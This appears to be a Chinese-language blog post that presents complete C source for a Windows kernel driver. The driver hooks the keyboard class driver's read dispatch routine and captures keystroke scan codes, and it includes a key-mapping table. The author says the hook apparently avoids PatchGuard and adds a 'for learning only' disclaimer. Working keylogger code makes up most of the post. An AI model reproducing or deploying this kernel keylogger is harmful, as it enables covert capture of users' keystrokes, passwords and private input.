KEYBOARD FSD HOOK

KEYBOARD FSD HOOK

说明:技术仅供学习使用,如恶意利用,与作者无关!

技术简介

上一篇文章我们讲了NTFS FSD HOOK其实,它不只这些功能,他可以拦截键盘输入,拦截Create请求等等….
其代码也十分模板化,只需要ObReferenceObjectByName然后对你需要HOOK的地方执行转换,变成我们的实现就可以了!
据我测试,不会触发PG(至少不会立刻)

我们驱动的分发函数是这样写的:

DriverObject->MajorFunction[IRP_MJ_CREATE] = (PDRIVER_DISPATCH)NtfsFsdCreate;

我们只要改了MajorFunction[IRP_MJ_CREATE],改成我们的,我们就能拦截IRP_MJ_CREATE请求!

Tips:这里我说一下,FSD HOOK不仅仅是文件系统HOOK,只要是MajorFunction都可以HOOK!

源码

Main.cpp

#include <ntifs.h>
#include <ntddkbd.h>
#include <ntdef.h>
#include <windef.h>

EXTERN_C_START
NTSYSAPI NTSTATUS NTAPI ObReferenceObjectByName(
    __in PUNICODE_STRING ObjectName,
    __in ULONG Attributes,
    __in_opt PACCESS_STATE AccessState,
    __in_opt ACCESS_MASK DesiredAccess,
    __in POBJECT_TYPE ObjectType,
    __in KPROCESSOR_MODE AccessMode,
    __inout_opt PVOID ParseContext,
    __out PVOID* Object
);

extern POBJECT_TYPE* IoDriverObjectType;
EXTERN_C_END

typedef NTSTATUS(*IRP_MJ_SERIES)
(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp
    );

IRP_MJ_SERIES KbdRead = NULL;
PDRIVER_OBJECT KbdDrvObj;
static int KbdStatus = 4;

CONST BYTE AsciiTable[] = {
    0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09,    //normal
    0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,
    0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76,
    0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E,

    0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09,    //caps
    0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x5B, 0x5D, 0x0D, 0x00, 0x41, 0x53,
    0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x5A, 0x58, 0x43, 0x56,
    0x42, 0x4E, 0x4D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E,

    0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09,    //shift
    0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53,
    0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x5A, 0x58, 0x43, 0x56,
    0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E,

    0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09,    //caps + shift
    0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x7B, 0x7D, 0x0D, 0x00, 0x61, 0x73,
    0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x7A, 0x78, 0x63, 0x76,
    0x62, 0x6E, 0x6D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
    0x32, 0x33, 0x30, 0x2E
};

NTSTATUS Fake_KbdFsdReadCompletion(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context)
{
    if (NT_SUCCESS(Irp->IoStatus.Status))
    {
        LPVOID Buffer = Irp->AssociatedIrp.SystemBuffer;
        PKEYBOARD_INPUT_DATA KeyData = (PKEYBOARD_INPUT_DATA)Buffer;
        KdPrint(("%sScanCode:%x", KeyData->Flags ? "UP: " : "DOWN: ", KeyData->MakeCode));
    }
    if (Irp->PendingReturned)
        IoMarkIrpPending(Irp);
    if ((Irp->StackCount > (ULONG)1) && (Context != NULL))
        return ((PIO_COMPLETION_ROUTINE)Context)(DeviceObject, Irp, NULL);
    else
        return Irp->IoStatus.Status;
}

NTSTATUS Fake_KbdDispatchRead(IN PDEVICE_OBJECT pDeviceObject, IN PIRP pIrp)
{
    PIO_STACK_LOCATION irpSp;
    irpSp = IoGetCurrentIrpStackLocation(pIrp);

    irpSp->Control =
        SL_INVOKE_ON_SUCCESS |
        SL_INVOKE_ON_ERROR |
        SL_INVOKE_ON_CANCEL;

    irpSp->Context = irpSp->CompletionRoutine;
    irpSp->CompletionRoutine = (PIO_COMPLETION_ROUTINE)Fake_KbdFsdReadCompletion;

    return KbdRead(pDeviceObject, pIrp);
}

EXTERN_C NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath)
{
    UNREFERENCED_PARAMETER(pDriverObject);
    UNREFERENCED_PARAMETER(pRegistryPath);

    NTSTATUS ntStatus = STATUS_SUCCESS;
    UNICODE_STRING uniKbdDrvName = RTL_CONSTANT_STRING(L"\\Driver\\Kbdclass");
    ntStatus = ObReferenceObjectByName(&uniKbdDrvName, OBJ_CASE_INSENSITIVE, 0, 0, *IoDriverObjectType, KernelMode, 0, (PVOID*)&KbdDrvObj);
    if (NT_SUCCESS(ntStatus))
    {
        volatile PLONG64 HookPoint = NULL;
        if (MmIsAddressValid(KbdDrvObj))
            KbdRead = (IRP_MJ_SERIES)InterlockedExchange64((PLONG64 volatile)(&KbdDrvObj->MajorFunction[IRP_MJ_READ]), (ULONG64)Fake_KbdDispatchRead);
    }
    else
        KdPrint(("KBD FSD HOOK Fail... Errorcode:%08X\n", ntStatus));
    return ntStatus;
}

   转载规则

请联系作者付费转载。
 本篇
KEYBOARD FSD HOOK KEYBOARD FSD HOOK
KEYBOARD FSD HOOK说明:技术仅供学习使用,如恶意利用,与作者无关!技术简介上一篇文章我们讲了NTFS FSD HOOK其实,它不只这些功能,他可以拦截键盘输入,拦截Create请求等等….其代码也十分模板化,只需要ObRef
2020-04-06
下一篇 
NTFS FSD HOOK NTFS FSD HOOK
NTFS FSD HOOK说明:技术仅供学习使用,如恶意利用,与作者无关!原理简介还记得我们的DeviceIoControl的分发函数嘛?在Windows下,所有的API都会经过某个驱动的某个MajorFunction.我们只要更改这个Ma
2020-04-04
  目录